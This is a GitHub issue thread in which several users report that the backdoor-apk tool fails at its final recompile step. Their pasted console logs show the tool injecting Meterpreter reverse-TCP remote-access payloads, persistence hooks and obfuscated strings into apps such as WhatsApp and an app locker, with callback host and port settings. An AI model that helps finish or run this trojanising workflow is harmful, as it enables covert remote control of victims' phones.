### ISSUE TITLE
failed to recompile original project with backdoor in kali linux

### ISSUE THREAD

**Issue by PratapAdhav** [dana-at-cp/backdoor-apk#138]
**While recompiling the apk I got the error**

root@Pratap:~/backdoor-apk/backdoor-apk# ./backdoor-apk.sh applock.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.3 on Fri Jun  8 10:57:46 IST 2018
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: xxx.xxx.xxx.xxx
[?] Please enter an LPORT value: xxxx
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling original APK file...done.
[+] Keeping permissions of original project
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
**[!] Failed to recompile original project with backdoor**
root@Pratap:~/backdoor-apk/backdoor-apk#

**Comment by howto5166** [comment]
Just installed it and having the same issue.. Did someone found the solution??

**Comment by prizoner627** [comment]
same here :(

**Comment by prizoner627** [comment]
root@kali:~/backdoor-apk/backdoor-apk# ./backdoor-apk.sh WhatsApp.apk 
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.3 on Sun Jun 17 04:35:42 EDT 2018
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.8.101
[?] Please enter an LPORT value: 4444
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling original APK file...done.
[+] Keeping permissions of original project
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor

**Comment by PratapAdhav** [comment]
does anyone found the answer for the error

**Comment by dana-at-cp** [comment]
@PratapAdhav Have you tried to use Apktool on the APK file as a smoke test? Simply decompile the APK and attempt to recompile with Apktool. If the recompilation fails with Apktool alone then that's the problem.

**Comment by Naeemk10** [comment]
ple dana-at-cp how solv this error .....? ple help

**Comment by Naeemk10** [comment]
Ahmhty Rat same error >> decomplier feaild .using this error how to fix

**Comment by MQ-03** [comment]
root@Pratap:~/backdoor-apk/backdoor-apk# ./backdoor-apk.sh applock.apk
________
/ ______ 
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||||||| AAA AAA PPP PPP KKK KKK
|| _ o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||||||| AAA AAA PPP KKK KKK
|||| AAA AAA PPP KKK KKK
/
________||_____________________________________
/____________
|____________| Dana James Traversie

[*] Running backdoor-apk.sh v0.2.3 on Fri Jun 8 10:57:46 IST 2018
[+] Android payload options:

meterpreter/reverse_http 4) shell/reverse_http
meterpreter/reverse_https 5) shell/reverse_https
meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: xxx.xxx.xxx.xxx
[?] Please enter an LPORT value: xxxx
[+] Android manifest permission options:
Keep original
Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[] Generating RAT APK file...done.
[] Decompiling original APK file...done.
[+] Keeping permissions of original project
[] Running proguard on RAT APK file...done.
[] Decompiling obfuscated RAT APK file...done.
[] Creating new directories in original project for RAT smali files...done.
[] Copying RAT smali files to new directories in original project...done.
[] Fixing RAT smali files...done.
[] Obfuscating const-string values in RAT smali files...done.
[] Locating smali file to hook in original project...done.
[] Adding hook in original smali file...done.
[] Adding persistence hook in original project...done.
[] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor
root@Pratap:~/backdoor-apk/backdoor-apk#

how to solve this issue?

**Comment by FirstClickin** [comment]
**🛑🛑🛑 Here is The FIX 2019..** https://youtu.be/QfyYWioLEk4 Full Video by FirstClickin. Solved now file is Recompiling without Error
